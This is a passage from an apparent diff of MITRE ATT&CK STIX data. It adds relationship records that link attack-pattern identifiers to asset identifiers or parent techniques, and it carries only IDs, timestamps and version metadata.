"description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--53accf9e-5c74-4c3a-bcec-8805f3517ec9", + "created": "2020-07-07T09:45:06.463Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2020-07-13T14:49:39.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44", + "target_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--53b42de1-d0c9-4159-b8f9-ca98afde4632", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--53bc84a8-099e-44fa-9ad5-082f629aea29", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--53cfa0ee-9802-4abb-8be5-7411095dbe8f", + "created": "2020-10-02T15:59:11.783Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3", + "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--53d7a78d-1431-49e8-944c-62c875e58a20", + "created": "2023-09-29T17:08:37.793Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:08:37.793Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--540c6769-42cd-4386-a582-16ca7ee6c23a", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5425d1cd-8840-4640-90a3-72f3bd7151bd", + "created": "2023-09-29T17:44:32.341Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:44:32.341Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5433be76-6b23-4772-85d2-729e60aa1293", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--543b1584-381e-46d6-8c75-6bcb34368fdb", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--544e996c-0bdc-42b2-91af-14c27d4213b9", + "created": "2023-09-28T21:09:23.185Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:09:23.185Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5468d2b6-655b-4fd7-b5bf-fa5fb25ac2c3", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--54832c30-5799-4a6b-9396-7968c22365bc", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--54a7bc3f-c05f-4fb3-a980-ffc8750a0a56", + "created": "2023-09-28T20:10:44.014Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:10:44.014Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--54a9d357-aa1d-4955-82de-155cde18adf8", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--54a9f3ee-c9e7-4fb5-97f9-d2dff66b21a2", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--54ba8f30-07c8-4d46-a846-154414f499c1", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--54c1ce5c-8394-496c-8864-20b658722044", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--54ccd3a2-1f1b-43a3-82ef-a82c3f275689", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--54f549ce-0c9f-479c-adbc-ef6fc0a0b42f", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--55328440-eee4-42b7-9f3b-75fda09dd10d", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--553627c6-50bb-4c9f-a179-d01cbb4587de", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--55678635-c41a-40cf-9dcf-21dcc443a923", + "created": "2023-02-27T22:51:27.316Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-27T22:51:27.316Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", + "target_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--55777791-2fff-4e15-8ce2-0db29036545f", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--55796d36-9662-46ae-9736-77059a7c5680", + "created": "2024-06-26T14:48:59.559Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:48:59.559Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--559d4b9f-55ed-4626-9be2-a64638d0bfc3", + "created": "2020-10-15T12:05:58.968Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "target_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--55a08ced-3574-4c58-8db6-37e2e0ab6f1e", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--55f08f98-ffc6-474c-84a5-b7588265b16c", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--56135d10-44be-4ebd-89bd-cc8eb5854d55", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5615ee01-ab71-4c60-bc6d-dca2b9313b5b", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--564eb69b-41de-4ed6-b69b-4ea7906c4510", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5677e801-bd49-404b-b54a-6b00da52530c", + "created": "2023-09-29T16:39:01.824Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:39:01.824Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5678d95e-c756-4c6c-90bf-6d9399275e58", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--56896f6b-27fe-4396-bfea-d3c1a7580b18", + "created": "2023-09-29T18:05:18.147Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:05:18.147Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--56d6ec6f-434c-484b-b5c8-a1673f828c3b", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--56dde0e8-85e5-4a74-834f-e58b5e55ad2b", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--56e0f60e-b108-4a58-ac33-6a68116b735d", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--56e93bad-cb93-401d-9588-eb2ce6b96d25", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--56fdc4e6-50eb-48f1-bc39-6bd9a68d5d8c", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", 